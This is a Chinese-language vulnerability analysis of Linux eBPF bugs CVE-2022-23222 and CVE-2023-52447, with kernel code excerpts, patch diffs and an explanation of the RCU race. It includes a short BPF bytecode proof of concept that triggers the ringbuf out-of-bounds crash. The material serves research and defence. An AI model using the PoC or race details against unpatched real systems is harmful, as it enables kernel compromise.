Linux eBPF Design and Vulnerability Case Study - Part 2

這篇文章會繼續分析與 eBPF 相關的漏洞。

Vulnerability Case Study 2 - bpf: Fix out of bounds access for ringbuf helpers (CVE-2022-23222)

1. Introduction

該漏洞雖然在 2022 年 1 月就被修復，但 KernelCTF COS 用的 Linux 版本沒有 backport 到，才會導致在 2024 年還可以打。參考被打下的 cos-105-17412.294.62 的 kernel config 能知道使用的 kernel 版本為 5.15.146，因此我們會基於該版本的實作來分析。

Linux 在版本 5.15.146 時，check_func_arg() 的實作仍然處於舊版，因此跟 commit 上的有些許多不同，所以我們需要先透過漏洞發生的版本來了解漏洞成因，再回頭看 5.15.146 實作上的問題。

2. Root Cause Analysis

BPF program 呼叫一個 helper 時，會需要驗證參數型態是否與當前 register 的內容相符。Function check_helper_call() 負責檢查 call helper 是否合法，一開始會先取得對應 ID 的 function proto [1]，裡面包含了預期 register 的型態，而後他會依序對當前參數做檢查 [2]。

static int check_helper_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
                 int *insn_idx_p)
{
    // [...]
    if (env->ops->get_func_proto)
        fn = env->ops->get_func_proto(func_id, env->prog); // [1]
  
    // [...]
    for (i = 0; i < MAX_BPF_FUNC_REG_ARGS; i++) {
        err = check_func_arg(env, i, &meta, fn); // [2]
        if (err)
            return err;
    }
    // [...]
}

check_func_arg() 會驗證 BPF program 在呼叫 helper 時的參數是否符合型態，除了檢查 register 的 value type 要與 function 預期相同外 [3]，也會檢查 pointer-typed register 的存取操作是否合法 [4]。

static int check_func_arg(struct bpf_verifier_env *env, u32 arg,
              struct bpf_call_arg_meta *meta,
              const struct bpf_func_proto *fn)
{
    enum bpf_arg_type arg_type = fn->arg_type[arg];
    enum bpf_reg_type type = reg->type;
    // [...]
    err = check_reg_type(env, regno, arg_type, fn->arg_btf_id[arg]); // [3]
    switch ((u32)type) {
    // [...]
    case PTR_TO_STACK:
        break;
    default:
        err = __check_ptr_off_reg(env, reg, regno, // [4]
                      type == PTR_TO_BTF_ID);
    // [...]
    }
}

__check_ptr_off_reg() 會先檢查 register 是否有自己的 fixed offset (reg->off) [5]。舉例來說，如果 register value 是一個結構的 base address，reg->off 就可能會代表某欄位在結構中的 offset。此外，該 function 還會檢查 register 是否有非定值的 variable offset (reg->var_off)，該值代表了 register 的 value range。

static int __check_ptr_off_reg(struct bpf_verifier_env *env,
                   const struct bpf_reg_state *reg, int regno,
                   bool fixed_off_ok)
{
    if (!fixed_off_ok && reg->off) { // [5]
        // [...]
        return -EACCES;
    }

    if (!tnum_is_const(reg->var_off) || reg->var_off.value) { // [6]
        // [...]
        return -EACCES;
    }

    return 0;
}

也就是說 __check_ptr_off_reg() 會確保 helper 只會收到最一開始拿到的 pointer，而不是透過 bytecode 或其他方式修改過的版本。

分析 patch 可以得知，原本 function 預期的參數類型為 ARG_PTR_TO_ALLOC_MEM 不會做特別處理，但其實要用 __check_ptr_off_reg() 檢查。

     case PTR_TO_BUF:
     case PTR_TO_BUF | MEM_RDONLY:
     case PTR_TO_STACK:
+        /* Some of the argument types nevertheless require a
+         * zero register offset.
+         */
+        if (arg_type == ARG_PTR_TO_ALLOC_MEM)
+            goto force_off_check;
         break;
     /* All the rest must be rejected: */
     default:
+force_off_check:
         err = __check_ptr_off_reg(env, reg, regno,
                       type == PTR_TO_BTF_ID);

實際上只有兩個 helper 的參數類型會是 ARG_PTR_TO_ALLOC_MEM，分別為 bpf_ringbuf_submit() 以及 bpf_ringbuf_discard()。

const struct bpf_func_proto bpf_ringbuf_discard_proto = {
    .func        = bpf_ringbuf_discard,
    .arg1_type    = ARG_PTR_TO_ALLOC_MEM,
    // [...]
};

const struct bpf_func_proto bpf_ringbuf_submit_proto = {
    .func        = bpf_ringbuf_submit,
    .arg1_type    = ARG_PTR_TO_ALLOC_MEM,
    // [...]
};

這是因為 submit 與 discard 都是用來處理 reserve 操作的回傳位址，而 bpf_ringbuf_reserve() 的回傳值類型會是 RET_PTR_TO_ALLOC_MEM_OR_NULL。

const struct bpf_func_proto bpf_ringbuf_reserve_proto = {
    .func        = bpf_ringbuf_reserve,
    .ret_type    = RET_PTR_TO_ALLOC_MEM_OR_NULL,
    // [...]
};

類型為 RET_PTR_TO_ALLOC_MEM_OR_NULL 的值在 NULL check 後就會被 verifier promote 到 PTR_TO_MEM，同時也是與 ARG_PTR_TO_ALLOC_MEM 相容的 type。

static const struct bpf_reg_types *compatible_reg_types[__BPF_ARG_TYPE_MAX] = {
    // [...]
    [ARG_PTR_TO_ALLOC_MEM]        = &alloc_mem_types,
    // [...]
};
static const struct bpf_reg_types alloc_mem_types = { .types = { PTR_TO_MEM } };

而 PTR_TO_MEM 被允許做 pointer arithmetic (addition or subtraction)，導致 bpf_ringbuf_discard() 或 bpf_ringbuf_submit() 拿到的第一個參數已經是被修改過的 pointer，可能會產生 out-of-bound access 的問題。

回頭看 Linux 5.15.146，雖然 check_func_arg() 的 type value switch case 在當時被拆成許多 if-else 來處理，但仍沒有對 ARG_PTR_TO_ALLOC_MEM 做檢查，因此漏洞依然存在。

3. PoC

只需要對 bpf_ringbuf_reserve() [1] 回傳的 pointer 做運算操作 [2]，就可以在 bpf_ringbuf_discard() [3] 時拿到錯誤位址的 header 而觸發 crash。

{
    BPF_LD_MAP_FD(BPF_REG_1, ringbuf),
    BPF_MOV64_IMM(BPF_REG_2, 0x3000),
    BPF_MOV64_IMM(BPF_REG_3, 0x0),
    BPF_RAW_INSN(
        BPF_JMP | BPF_CALL, 0, 0, 0,
        BPF_FUNC_ringbuf_reserve), // [1]
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),
    BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),


    BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, -4), // [2]


    BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),
    BPF_MOV64_IMM(BPF_REG_2, 0x1),
    BPF_RAW_INSN(
        BPF_JMP | BPF_CALL, 0, 0, 0,
        BPF_FUNC_ringbuf_discard), // [3]

    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),
}

4. Others

現在看 Linux 6.6.35 的 BPF 時，又發現 check_func_arg() 的實作又長不一樣了，像是原本 bpf_ringbuf_{submit,discard} 的參數預期為 ARG_PTR_TO_ALLOC_MEM，但現在被改成 ARG_PTR_TO_RINGBUF_MEM，不會再跟其他 memory type 一起處理。

Vulnerability Case Study 3 - bpf: Defer the free of inner map when necessary (CVE-2023-52447)

1. Introduction

根據該漏洞的 commit log 可以猜測是與 BPF map 相關的 race condition 漏洞，並且成因與 RCU 沒有上 lock 有關。除此之外，該漏洞有被拿來打 kernelCTF，因此可以在 kernelCTF GitHub repo 找到 exploit 跟漏洞分析，下方範例程式碼也有很大一部分是參考該 exploit 的。

2. Nested Maps (map-in-map)

BPF 提供了 map 機制讓 kernel 與 userspace 可以共享同一塊記憶體來傳資料，而 map 的類型有許多種，像是 ringbuf、hashtab 與 array。除此之外，BPF 也提供了 nested map 的使用，也就是 array 的 element 為 map object，這種 map 的type enum 會叫做 BPF_MAP_TYPE_XXXX_OF_MAPS，不過目前也只有實作兩種類型。

BPF_MAP_TYPE_HASH_OF_MAPS (hashtab) - 使用 key-value 的方式來存取 element，每個 element 都會是 map，並且對應到一個 hash key
BPF_MAP_TYPE_ARRAY_OF_MAPS (arraymap) - 使用 array 的方式來存取 element，每個 element 都會是 map，並且以 integer 來 indexed

在建立 map-in-map 架構中的 outer map 時，process 需要額外提供一個 inner map fd 來當作之後 map element 的 template。舉例來說，建立一個 arraymap 會呼叫 callback function array_of_map_alloc()，並呼叫 bpf_map_meta_alloc() 建立 metadata bpf_map object [1]。

static struct bpf_map *array_of_map_alloc(union bpf_attr *attr)
{
    struct bpf_map *map, *inner_map_meta;

    inner_map_meta = bpf_map_meta_alloc(attr->inner_map_fd); // [1]
    map = array_map_alloc(attr);
    map->inner_map_meta = inner_map_meta;

    return map;
}

而 hashtab 也是相同的執行流程 [2]，只差在 outer map 一個是 array 一個是 hashtab，所以會呼叫不同的 map allocator。

static struct bpf_map *htab_of_map_alloc(union bpf_attr *attr)
{
    struct bpf_map *map, *inner_map_meta;

    inner_map_meta = bpf_map_meta_alloc(attr->inner_map_fd); // [2]
    map = htab_map_alloc(attr);
    map->inner_map_meta = inner_map_meta;

    return map;
}

Userspace process 可以參考下方程式碼來建立 nested map。

int inner = bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 4, 0x30, 0);
int outer_arraymap = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, 0x30, inner);
int outer_hashtab = bpf_create_map(BPF_MAP_TYPE_HASH_OF_MAPS, 4, 4, 0x30, inner);

3. Update Element

bpf() command BPF_MAP_UPDATE_ELEM 能讓 process 新增 element 到 map 中，而 kernel 底層會呼叫 map_update_elem() 來處理。該 function 會先從 fd 取出 bpf_map object [1]，再 dup 使用者傳入的 key [2] 與 value [3]，最後將 key-value pair 更新到 map 當中 [4]。

static int map_update_elem(union bpf_attr *attr, bpfptr_t uattr)
{
  struct bpf_map *map;
    // [...]
    f = fdget(ufd);
    map = __bpf_map_get(f); // [1]
    // [...]
    key = ___bpf_copy_key(ukey, map->key_size); // [2]
    // [...]
    value_size = bpf_map_value_size(map);
    value = kvmemdup_bpfptr(uvalue, value_size); // [3]
    // [...]
    err = bpf_map_update_value(map, f.file, key, value, attr->flags); // [4]
    // [...]
}

bpf_map_update_value() 會根據不同 map type 有不同的處理。如果 map type 為 arraymap 時 [5]，就會呼叫 bpf_fd_array_map_update_elem()，而如果是 hashtab 時 [6]，就會呼叫 bpf_fd_htab_map_update_elem()。

static int bpf_map_update_value(struct bpf_map *map, struct file *map_file,
                void *key, void *value, __u64 flags)
{
    // [...]
    } else if (IS_FD_ARRAY(map)) { // [5]
        rcu_read_lock();
        err = bpf_fd_array_map_update_elem(map, map_file, key, value,
                           flags);
        rcu_read_unlock();
    } else if (map->map_type == BPF_MAP_TYPE_HASH_OF_MAPS) { // [6]
        rcu_read_lock();
        err = bpf_fd_htab_map_update_elem(map, map_file, key, value,
                          flags);
        rcu_read_unlock();
    }
    // [...]
}

bpf_fd_array_map_update_elem() 預期傳入的 key 為 integer [7] 以及 value 為一個 map fd [8]。如果有舊的 element，就會在更新完將其釋放 [9]。

int bpf_fd_array_map_update_elem(struct bpf_map *map, struct file *map_file,
                 void *key, void *value, u64 map_flags)
{
    struct bpf_array *array = container_of(map, struct bpf_array, map);
    void *new_ptr, *old_ptr;
    u32 index = *(u32 *)key, ufd; // [7]
    // [...]
    ufd = *(u32 *)value;
    new_ptr = map->ops->map_fd_get_ptr(map, map_file, ufd); // [8]
    // [...]

    } else {
        old_ptr = xchg(array->ptrs + index, new_ptr);
    }

    if (old_ptr)
        map->ops->map_fd_put_ptr(old_ptr); // [9]
    return 0;
}

bpf_fd_htab_map_update_elem() 則是以 hash key 更新 table [10]，並且與 arraymap 相同，都會釋放掉舊的 element [11]。

int bpf_fd_htab_map_update_elem(struct bpf_map *map, struct file *map_file,
                void *key, void *value, u64 map_flags)
{
    void *ptr;
    int ret;
    u32 ufd = *(u32 *)value;

    ptr = map->ops->map_fd_get_ptr(map, map_file, ufd);
    ret = htab_map_update_elem(map, key, &ptr, map_flags); // [10]
    if (ret)
        map->ops->map_fd_put_ptr(ptr); // [11]

    return ret;
}

而 arraymap 與 hashtab 的 .map_fd_put_ptr 都是 bpf_map_fd_put_ptr()，用來釋放 map object。

const struct bpf_map_ops array_of_maps_map_ops = {
    // [...]
    .map_free = array_of_map_free,
    .map_fd_put_ptr = bpf_map_fd_put_ptr,
    // [...]
};

const struct bpf_map_ops htab_of_maps_map_ops = {
    // [...]
    .map_free = htab_of_map_free,
    .map_fd_put_ptr = bpf_map_fd_put_ptr,
    // [...]
};

bpf_map_fd_put_ptr() 為 bpf_map_put() 的 wrapper function。Function bpf_map_put() 會先更新 refcnt，並在 refcnt 為 0 時 enqueue work [12] 執行 bpf_map_free_deferred() 來釋放 inner bpf_map object。

void bpf_map_put(struct bpf_map *map)
{
    if (atomic64_dec_and_test(&map->refcnt)) {
        bpf_map_free_id(map);
        btf_put(map->btf);
        INIT_WORK(&map->work, bpf_map_free_deferred); // [12]
        queue_work(system_unbound_wq, &map->work);
    }
}

bpf_map_free_deferred() 會呼叫 operation table 的 .map_free callback 來釋放 map。

static void bpf_map_free_deferred(struct work_struct *work)
{
    struct bpf_map *map = container_of(work, struct bpf_map, work);
    // [...]
    map->ops->map_free(map);
    // [...]
}

4. Run BPF Program

當接收或發送 packet 時會呼叫 sk_filter() 執行 filter hook，而該 function 是 sk_filter_trim_cap() 的 wrapper function。

static inline int sk_filter(struct sock *sk, struct sk_buff *skb)
{
    return sk_filter_trim_cap(sk, skb, 1);
}

sk_filter_trim_cap() 會呼叫 bpf_prog_run_save_cb() [1] 執行 filter hook，而 socket 可以呼叫 setsockopt(SO_ATTACH_BPF) 新增 BPF program 作為 filter hook。除此之外，在執行 hook 前會上 RCU lock [2]，確保執行過程中不會釋放 RCU-protected object。

int sk_filter_trim_cap(struct sock *sk, struct sk_buff *skb, unsigned int cap)
{
    // [...]
    rcu_read_lock(); // [2]
    filter = rcu_dereference(sk->sk_filter);
    if (filter) {
        // [...]
        pkt_len = bpf_prog_run_save_cb(filter->prog, skb); // [1]
        // [...]
    }
    rcu_read_unlock();
}

底層會再呼叫到 __bpf_prog_run()，該 function 會呼叫 bpf_dispatcher_nop_func() 間接執行 BPF JIT code [3]。

static __always_inline u32 __bpf_prog_run(const struct bpf_prog *prog,
                      const void *ctx,
                      bpf_dispatcher_fn dfunc)
{
    // [...]
    } else {
        ret = dfunc(ctx, prog->insnsi, prog->bpf_func); // [3]
    }
    return ret;
}

5. Root Cause Analysis

在分析時會發現除了 kernelCTF sheet 上的 patch 之外，前面也有一些 patch 與該漏洞相關，像是 commit 79d93b3 就改變了刪除 elemenet 時 function call，除了原本的參數外，patch 後還需要傳入 need_defer 判斷是否需要延遲釋放 map object。

diff --git a/kernel/bpf/arraymap.c b/kernel/bpf/arraymap.c
index f9aed5909d6e0b..4a4a67956e2119 100644
--- a/kernel/bpf/arraymap.c
+++ b/kernel/bpf/arraymap.c
@@ -871,7 +871,7 @@ int bpf_fd_array_map_update_elem(struct bpf_map *map, struct file *map_file,
     return 0;
 }
 
-static long fd_array_map_delete_elem(struct bpf_map *map, void *key)
+static long __fd_array_map_delete_elem(struct bpf_map *map, void *key, bool need_defer)
 {
     struct bpf_array *array = container_of(map, struct bpf_array, map);
     void *old_ptr;
@@ -890,13 +890,18 @@ static long fd_array_map_delete_elem(struct bpf_map *map, void *key)
     }
 
     if (old_ptr) {
-        map->ops->map_fd_put_ptr(map, old_ptr, true);
+        map->ops->map_fd_put_ptr(map, old_ptr, need_defer);
         return 0;
     } else {
         return -ENOENT;
     }
 }

回到原本的 commit，當 bpf_map_fd_put_ptr() 處理 need_defer == true 時，會更新 bpf_map object 的 free_after_mult_rcu_gp 成 true。

diff --git a/kernel/bpf/map_in_map.c b/kernel/bpf/map_in_map.c
index 2dfeb5835e1656..3248ff5d816172 100644
--- a/kernel/bpf/map_in_map.c
+++ b/kernel/bpf/map_in_map.c
@@ -129,10 +129,15 @@ void *bpf_map_fd_get_ptr(struct bpf_map *map,
 
 void bpf_map_fd_put_ptr(struct bpf_map *map, void *ptr, bool need_defer)
 {
-    /* ptr->ops->map_free() has to go through one
-     * rcu grace period by itself.
+    struct bpf_map *inner_map = ptr;
+
+    /* The inner map may still be used by both non-sleepable and sleepable
+     * bpf program, so free it after one RCU grace period and one tasks
+     * trace RCU grace period.
      */
-    bpf_map_put(ptr);
+    if (need_defer)
+        WRITE_ONCE(inner_map->free_after_mult_rcu_gp, true);
+    bpf_map_put(inner_map);
 }

在 bpf_map_put() 時，如果 bpf_map object 的 free_after_mult_rcu_gp == true，就會透過 rcu 來保證要被 free 的 map 不會發生 UAF。

-        INIT_WORK(&map->work, bpf_map_free_deferred);
-        /* Avoid spawning kworkers, since they all might contend
-         * for the same mutex like slab_mutex.
-         */
-        queue_work(system_unbound_wq, &map->work);
+
+        if (READ_ONCE(map->free_after_mult_rcu_gp))
+            call_rcu_tasks_trace(&map->rcu, bpf_map_free_mult_rcu_gp);
+        else
+            bpf_map_free_in_work(map);

RCU 的機制優化了讀取較多的使用情境，簡單來說就是把更新拆成兩個階段：移除 (removal) 跟釋放 (reclamation)。移除是指把原本能 reference 到 target object 的 pointer 清空或指向新的 object 位址，讓接下來的 reader 不會拿到舊的 object。而釋放則是等待移除前就在使用 (ongoing) target object 的那些 reader，等他們執行結束後再把 target object 給釋放掉。關於更詳細的 RCU 機制介紹可以參考 Linux documentation。

也就是說原先釋放的執行流程在釋放 map-in-map element 前沒有等 RCU，導致 map object 能在 BPF program 執行到一半被釋放掉，就會有 UAF。

## Thread 1 (free map-in-map)
__fd_array_map_delete_elem()
  bpf_map_fd_put_ptr()
    queue_work()
    bpf_map_free_deferred() (in callback)
      map->ops->map_free()     <---------------
                                              |
## Thread 2 (UAF bpf program)                 |
reg8 = BPF_FUNC_map_lookup_elem               |
heavy job                                     |
access reg8 (UAF!!!)   <-----------------------

我們在 “Run BPF Program” 時有提到執行 BPF program 前會執行 rcu_read_lock()，但是 reclaimer 沒有考慮到 RCU lock 就直接釋放，因此 patch 多加上 call_rcu_tasks_trace()，讓 map-in-map element 會等到離開 RCU critical section 才釋放。

__fd_array_map_delete_elem()
  bpf_map_fd_put_ptr()
    call_rcu_tasks_trace()
    bpf_map_free_mult_rcu_gp() (in rcu callback)
      queue_work()
      bpf_map_free_deferred() (in callback)
        map->ops->map_free()

多加上的 call_rcu_tasks_trace() 能所有 task 經過了 RCU critical sections “quiescent state” 才執行 callback function，確保了 RCU-protected object 的安全。